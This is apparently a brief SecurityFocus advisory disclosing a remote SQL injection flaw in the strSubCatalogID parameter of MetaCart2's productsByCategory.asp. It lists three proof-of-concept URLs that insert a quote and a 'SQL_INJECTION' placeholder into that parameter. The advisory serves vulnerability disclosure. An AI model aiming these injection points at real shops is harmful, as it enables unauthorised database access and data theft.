MetaCart2 StrSubCatalogID Parameter Remote SQL Injection Vulnerability

No exploit is required to leverage this issue.

The following proof of concepts are available:

http://www.example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
http://www.example.com/mcart2pal/productsByCategory.asp?strSubCatalogID=%27SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
http://www.example.com/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION


 

Privacy Statement
Copyright 2010, SecurityFocus